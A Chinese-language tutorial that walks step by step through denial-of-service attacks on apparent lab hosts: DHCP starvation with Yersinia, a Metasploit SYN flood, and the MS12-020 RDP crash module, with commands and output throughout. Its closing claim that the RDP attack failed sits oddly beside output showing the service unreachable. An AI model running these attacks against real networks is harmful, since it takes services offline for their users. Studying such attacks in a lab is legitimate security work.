基于应用层的拒绝服务攻击
本文中以DHCP和HTTP(传统网页协议这里不赘述)为例
环境:Kali2021
DHCP:Yersinia
打开图形化界面
yersinia -G
选择Launch attack
选择DHCP中的第二个sending DISCOVER packet
sending RAW packet:发送原始数据包
sending DISCOVER packet:发送请求获取IP地址数据包,占用所有IP,造成拒绝服务
creating DHCP rogue server:穿件虚假的DHCP服务器,让用户连接,真正的DHCP无法工作
sending RELEASE packet:发送释放IP请求到DHCP服务器,使得正在使用IP全部失效
点击OK
此时使用手机连接网络,显示正在获取IP地址,且一直卡在那
HTTP:Metasploit
打开metasploit
msfconsole
收缩DOS(拒绝服务攻击)相关模块
search dos
msf6 > search dos
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/cable_haunt_websocket_dos 2020-01-07 normal No "Cablehaunt" Cable Modem WebSocket DoS
1 auxiliary/dos/http/3com_superstack_switch 2004-06-24 normal No 3Com SuperStack Switch Denial of Service
2 auxiliary/dos/scada/igss9_dataserver 2011-12-20 normal No 7-Technologies IGSS 9 IGSSdataServer.exe DoS
3 exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript)
4 auxiliary/dos/android/android_stock_browser_iframe 2012-12-01 normal No Android Stock Browser Iframe DOS
5 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
6 auxiliary/dos/http/apache_range_dos 2011-08-19 normal No Apache Range Header DoS (Apache Killer)
7 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
8 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
9 auxiliary/dos/windows/appian/appian_bpm 2007-12-17 normal No Appian Enterprise Business Suite 5.6 SP1 DoS
10 auxiliary/dos/mdns/avahi_portzero 2008-11-14 normal No Avahi Source Port 0 DoS
11 auxiliary/dos/dns/bind_tkey 2015-07-28 normal No BIND TKEY Query Denial of Service
12 auxiliary/dos/dns/bind_tsig_badtime 2020-05-19 normal No BIND TSIG Badtime Query Denial of Service
13 auxiliary/dos/dns/bind_tsig 2016-09-27 normal No BIND TSIG Query Denial of Service
14 auxiliary/dos/scada/beckhoff_twincat 2011-09-13 normal No Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS
15 auxiliary/dos/http/brother_debut_dos 2017-11-02 normal No Brother Debut http Denial Of Service
16 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
17 auxiliary/dos/http/canon_wireless_printer 2013-06-18 normal No Canon Wireless Printer Denial Of Service
18 auxiliary/admin/chromecast/chromecast_reset normal No Chromecast Factory Reset DoS
......
......
134 auxiliary/dos/http/ws_dos normal No ws - Denial of Service
Interact with a module by name or index. For example info 134, use 134 or use auxiliary/dos/http/ws_dos
msf6 >
这里使用auxiliary/dos/tcp/synflood对目标进行一次SYN拒绝服务攻击
msf6 > search synflood
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/tcp/synflood normal No TCP SYN Flooder
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/dos/tcp/synflood
msf6 > use 0
msf6 auxiliary(dos/tcp/synflood) > options
Module options (auxiliary/dos/tcp/synflood):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
NUM no Number of SYNs to send (else unlimited)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port
SHOST no The spoofable source address (else randomizes)
SNAPLEN 65535 yes The number of bytes to capture
SPORT no The source port (else randomizes)
TIMEOUT 500 yes The number of seconds to wait for new data
msf6 auxiliary(dos/tcp/synflood) > set rhost 192.168.1.108
rhost => 192.168.1.108
先看一下192.168.1.108是否可以访问
可以访问,进行exploit
msf6 auxiliary(dos/tcp/synflood) > exploit
[*] Running module against 192.168.1.108
[*] SYN flooding 192.168.1.108:80...
目标不能访问
MS12_020:远程桌面协议(RDP)漏洞
msf6 > search ms12_020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf6 > use 1
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > setg rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit
[*] Running module against 192.168.1.106
[*] 192.168.1.106:3389 - 192.168.1.106:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.1.106:3389 - 192.168.1.106:3389 - 210 bytes sent
[*] 192.168.1.106:3389 - 192.168.1.106:3389 - Checking RDP status...
[-] 192.168.1.106:3389 - 192.168.1.106:3389 - RDP Service Unreachable
[*] Auxiliary module execution completed
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) >
使用漏洞检测模块
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > search ms12_020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > use 0
msf6 auxiliary(scanner/rdp/ms12_020_check) > options
Module options (auxiliary/scanner/rdp/ms12_020_check):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.106 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes Remote port running RDP (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/rdp/ms12_020_check) > setg threads 100
threads => 100
msf6 auxiliary(scanner/rdp/ms12_020_check) > run
[+] 192.168.1.106:3389 - 192.168.1.106:3389 - The target is vulnerable.
[*] 192.168.1.106:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
显示可以攻击,但是攻击时却无法成功,试了很多次,没有发现原因